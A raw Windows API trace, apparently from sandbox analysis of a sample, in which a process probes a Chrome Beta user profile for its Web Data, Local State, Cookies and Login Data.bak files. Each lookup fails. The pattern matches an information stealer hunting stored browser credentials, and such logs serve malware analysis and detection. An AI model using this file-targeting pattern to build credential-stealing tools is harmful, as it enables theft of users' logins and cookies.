GetProcessHeap () returned 0x5f0000 [0180.228] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613680 [0180.228] GetProcessHeap () returned 0x5f0000 [0180.228] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613680, Size=0x93) returned 0x611f60 [0180.228] GetProcessHeap () returned 0x5f0000 [0180.228] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4a) returned 0x620140 [0180.228] GetProcessHeap () returned 0x5f0000 [0180.228] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620140, Size=0xa3) returned 0x6247e0 [0180.228] GetProcessHeap () returned 0x5f0000 [0180.228] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x52) returned 0x618470 [0180.228] GetProcessHeap () returned 0x5f0000 [0180.228] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6247e0 | out: hHeap=0x5f0000) returned 1 [0180.228] GetProcessHeap () returned 0x5f0000 [0180.228] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.228] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.228] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\Web Data") returned 0 [0180.228] GetProcessHeap () returned 0x5f0000 [0180.228] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.228] GetProcessHeap () returned 0x5f0000 [0180.228] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618470 | out: hHeap=0x5f0000) returned 1 [0180.228] GetProcessHeap () returned 0x5f0000 [0180.228] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f450 [0180.229] GetProcessHeap () returned 0x5f0000 [0180.229] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615f60 [0180.229] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.229] GetProcessHeap () returned 0x5f0000 [0180.229] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.229] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.229] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.229] GetProcessHeap () returned 0x5f0000 [0180.229] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.229] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.229] GetProcessHeap () returned 0x5f0000 [0180.229] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x27) returned 0x613440 [0180.229] GetProcessHeap () returned 0x5f0000 [0180.229] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613c20 [0180.229] GetProcessHeap () returned 0x5f0000 [0180.229] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613c20, Size=0x93) returned 0x611f60 [0180.229] GetProcessHeap () returned 0x5f0000 [0180.229] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4a) returned 0x620280 [0180.229] GetProcessHeap () returned 0x5f0000 [0180.229] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620280, Size=0xaf) returned 0x6247e0 [0180.229] GetProcessHeap () returned 0x5f0000 [0180.229] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x58) returned 0x618050 [0180.229] GetProcessHeap () returned 0x5f0000 [0180.229] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6247e0 | out: hHeap=0x5f0000) returned 1 [0180.229] GetProcessHeap () returned 0x5f0000 [0180.229] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.229] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.229] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\..\\Local State") returned 0 [0180.229] GetProcessHeap () returned 0x5f0000 [0180.230] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.230] GetProcessHeap () returned 0x5f0000 [0180.230] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618050 | out: hHeap=0x5f0000) returned 1 [0180.230] GetProcessHeap () returned 0x5f0000 [0180.230] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f390 [0180.230] GetProcessHeap () returned 0x5f0000 [0180.230] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615f60 [0180.230] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.230] GetProcessHeap () returned 0x5f0000 [0180.230] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.230] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.230] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.230] GetProcessHeap () returned 0x5f0000 [0180.230] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613440 [0180.230] lstrcpyA (in: lpString1=0x613440, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.230] GetProcessHeap () returned 0x5f0000 [0180.230] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x27) returned 0x613320 [0180.230] GetProcessHeap () returned 0x5f0000 [0180.230] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x6137a0 [0180.230] GetProcessHeap () returned 0x5f0000 [0180.230] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6137a0, Size=0x93) returned 0x611f60 [0180.230] GetProcessHeap () returned 0x5f0000 [0180.230] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4a) returned 0x6200f0 [0180.230] GetProcessHeap () returned 0x5f0000 [0180.230] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6200f0, Size=0xa1) returned 0x6247e0 [0180.230] GetProcessHeap () returned 0x5f0000 [0180.230] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613440, Size=0x51) returned 0x618890 [0180.230] GetProcessHeap () returned 0x5f0000 [0180.230] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6247e0 | out: hHeap=0x5f0000) returned 1 [0180.230] GetProcessHeap () returned 0x5f0000 [0180.230] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.231] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.231] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\Cookies") returned 0 [0180.231] GetProcessHeap () returned 0x5f0000 [0180.231] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.231] GetProcessHeap () returned 0x5f0000 [0180.231] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618890 | out: hHeap=0x5f0000) returned 1 [0180.231] GetProcessHeap () returned 0x5f0000 [0180.231] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x105) returned 0x6247e0 [0180.231] GetProcessHeap () returned 0x5f0000 [0180.231] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f290 [0180.231] GetProcessHeap () returned 0x5f0000 [0180.231] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x105) returned 0x624900 [0180.231] GetProcessHeap () returned 0x5f0000 [0180.231] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615ea0 [0180.231] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.231] GetProcessHeap () returned 0x5f0000 [0180.231] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x5f0000) returned 1 [0180.231] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x624900, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.231] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.231] GetProcessHeap () returned 0x5f0000 [0180.231] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f350 [0180.231] GetProcessHeap () returned 0x5f0000 [0180.231] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.231] GetProcessHeap () returned 0x5f0000 [0180.231] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x93) returned 0x611f60 [0180.231] GetProcessHeap () returned 0x5f0000 [0180.231] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4a) returned 0x620410 [0180.231] GetProcessHeap () returned 0x5f0000 [0180.231] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620410, Size=0xa7) returned 0x624a20 [0180.231] GetProcessHeap () returned 0x5f0000 [0180.231] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x54) returned 0x6186b0 [0180.231] GetProcessHeap () returned 0x5f0000 [0180.231] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6186b0, Size=0xaf) returned 0x624d50 [0180.232] GetProcessHeap () returned 0x5f0000 [0180.232] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624a20 | out: hHeap=0x5f0000) returned 1 [0180.232] GetProcessHeap () returned 0x5f0000 [0180.232] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.232] GetProcessHeap () returned 0x5f0000 [0180.232] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f350 | out: hHeap=0x5f0000) returned 1 [0180.232] GetProcessHeap () returned 0x5f0000 [0180.232] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x615ca0 [0180.232] GetProcAddress (hModule=0x7ffb26230000, lpProcName="MultiByteToWideChar") returned 0x7ffb2624d500 [0180.232] GetProcessHeap () returned 0x5f0000 [0180.232] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0180.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x624d50, cbMultiByte=87, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0180.232] GetProcAddress (hModule=0x7ffb288f0000, lpProcName="SysAllocStringLen") returned 0x7ffb288fe5b0 [0180.232] GetProcessHeap () returned 0x5f0000 [0180.232] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f2f0 [0180.232] GetProcessHeap () returned 0x5f0000 [0180.232] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x615ca0 [0180.232] GetProcAddress (hModule=0x7ffb26230000, lpProcName="MultiByteToWideChar") returned 0x7ffb2624d500 [0180.232] GetProcessHeap () returned 0x5f0000 [0180.232] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0180.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x624d50, cbMultiByte=87, lpWideCharStr=0x621108, cchWideChar=87 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\Login Data.bak") returned 87 [0180.232] GetProcessHeap () returned 0x5f0000 [0180.232] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x615ce0 [0180.232] GetProcAddress (hModule=0x7ffb26230000, lpProcName="WideCharToMultiByte") returned 0x7ffb2624b490 [0180.232] GetProcessHeap () returned 0x5f0000 [0180.232] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ce0 | out: hHeap=0x5f0000) returned 1 [0180.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\Login Data.bak", cchWideChar=87, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 87 [0180.232] GetProcessHeap () returned 0x5f0000 [0180.232] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f470 [0180.233] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0180.233] GetProcessHeap () returned 0x5f0000 [0180.233] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f470 | out: hHeap=0x5f0000) returned 1 [0180.233] GetProcessHeap () returned 0x5f0000 [0180.233] GetProcessHeap () returned 0x5f0000 [0180.233] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f400 [0180.233] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0180.233] GetProcessHeap () returned 0x5f0000 [0180.233] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f400 | out: hHeap=0x5f0000) returned 1 [0180.233] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f2f0, Size=0x58) returned 0x6180b0 [0180.233] GetProcessHeap () returned 0x5f0000 [0180.233] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x615ea0 [0180.233] GetProcAddress (hModule=0x7ffb26230000, lpProcName="WideCharToMultiByte") returned 0x7ffb2624b490 [0180.233] GetProcessHeap () returned 0x5f0000 [0180.233] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x5f0000) returned 1 [0180.233] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\Login Data.bak", cchWideChar=87, lpMultiByteStr=0x6180b0, cbMultiByte=87, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\Login Data.bak", lpUsedDefaultChar=0x0) returned 87 [0180.233] GetProcAddress (hModule=0x7ffb288f0000, lpProcName="SysFreeString") returned 0x7ffb28900ae0 [0180.233] GetProcessHeap () returned 0x5f0000 [0180.233] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x58) returned 0x618110 [0180.233] GetProcessHeap () returned 0x5f0000 [0180.233] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6180b0 | out: hHeap=0x5f0000) returned 1 [0180.233] GetProcessHeap () returned 0x5f0000 [0180.233] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618110 | out: hHeap=0x5f0000) returned 1 [0180.233] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2a0) returned 0x624e10 [0180.233] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x624e10) returned 0x2a0 [0180.233] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30) returned 0x613320 [0180.234] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x613320) returned 0x30 [0180.234] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x80) returned 0x611f60 [0180.234] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x611f60) returned 0x80 [0180.236] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x20) returned 0x615ea0 [0180.236] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x615ea0) returned 0x20 [0180.236] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x80) returned 0x624a20 [0180.236] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x624a20) returned 0x80 [0180.236] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x20) returned 0x615f60 [0180.236] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x615f60) returned 0x20 [0180.236] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x80) returned 0x6250c0 [0180.236] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x6250c0) returned 0x80 [0180.236] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x20) returned 0x615ca0 [0180.236] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x615ca0) returned 0x20 [0180.236] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x60) returned 0x618290 [0180.236] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x618290) returned 0x60 [0180.236] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x48) returned 0x620190 [0180.236] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x620190) returned 0x48 [0180.236] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x88) returned 0x61cca0 [0180.236] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x61cca0) returned 0x88 [0180.237] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x828) returned 0x625150 [0180.237] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625150) returned 0x828 [0180.237] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x618290, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 88 [0180.237] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb0) returned 0x625990 [0180.237] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625990) returned 0xb0 [0180.237] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x618290, cbMultiByte=-1, lpWideCharStr=0x625990, cchWideChar=88 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\Login Data.bak") returned 88 [0180.237] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\Login Data.bak", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x58 [0180.237] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb8) returned 0x621280 [0180.237] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x621280) returned 0xb8 [0180.237] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\Login Data.bak", nBufferLength=0x5b, lpBuffer=0x621280, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\Login Data.bak", lpFilePart=0x0) returned 0x57 [0180.237] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625990) returned 0xb0 [0180.237] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625990 | out: hHeap=0x5f0000) returned 1 [0180.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\Login Data.bak", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 88 [0180.237] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x58) returned 0x6183b0 [0180.237] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x6183b0) returned 0x58 [0180.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\Login Data.bak", cchWideChar=-1, lpMultiByteStr=0x6183b0, cbMultiByte=88, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\Login Data.bak", lpUsedDefaultChar=0x0) returned 88 [0180.237] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x621280) returned 0xb8 [0180.237] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x621280 | out: hHeap=0x5f0000) returned 1 [0180.237] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x6183b0) returned 0x58 [0180.237] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6183b0 | out: hHeap=0x5f0000) returned 1 [0180.237] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3c8) returned 0x625990 [0180.237] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625990) returned 0x3c8 [0180.237] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625150) returned 0x828 [0180.237] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625150 | out: hHeap=0x5f0000) returned 1 [0180.237] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x625c40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 88 [0180.238] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb0) returned 0x625150 [0180.238] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625150) returned 0xb0 [0180.238] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x625c40, cbMultiByte=-1, lpWideCharStr=0x625150, cchWideChar=88 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\Login Data.bak") returned 88 [0180.238] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\Login Data.bak" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\default\\login data.bak"), fInfoLevelId=0x0, lpFileInformation=0x5cef70 | out: lpFileInformation=0x5cef70*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.238] GetLastError () returned 0x3 [0180.238] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\Login Data.bak" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\default\\login data.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0180.238] GetLastError () returned 0x3 [0180.238] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x3, dwLanguageId=0x0, lpBuffer=0x5ced78, nSize=0x0, Arguments=0x0 | out: lpBuffer="苰a") returned 0x2c [0180.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="The system cannot find the path specified.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0180.238] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30) returned 0x613440 [0180.238] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x613440) returned 0x30 [0180.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="The system cannot find the path specified.\r\n", cchWideChar=-1, lpMultiByteStr=0x613440, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The system cannot find the path specified.\r\n", lpUsedDefaultChar=0x0) returned 45 [0180.238] LocalFree (hMem=0x6182f0) returned 0x0 [0180.238] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x613440) returned 0x30 [0180.238] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.238] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625150) returned 0xb0 [0180.238] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625150 | out: hHeap=0x5f0000) returned 1 [0180.238] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x625c40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 88 [0180.238] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb0) returned 0x625150 [0180.238] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625150) returned 0xb0 [0180.238] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x625c40, cbMultiByte=-1, lpWideCharStr=0x625150, cchWideChar=88 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\Login Data.bak") returned 88 [0180.238] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\Login Data.bak" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\default\\login data.bak"), fInfoLevelId=0x0, lpFileInformation=0x5cef70 | out: lpFileInformation=0x5cef70*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.239] GetLastError () returned 0x3 [0180.239] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\Login Data.bak" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\default\\login data.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0180.239] GetLastError () returned 0x3 [0180.239] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x3, dwLanguageId=0x0, lpBuffer=0x5ced78, nSize=0x0, Arguments=0x0 | out: lpBuffer="蚰a") returned 0x2c 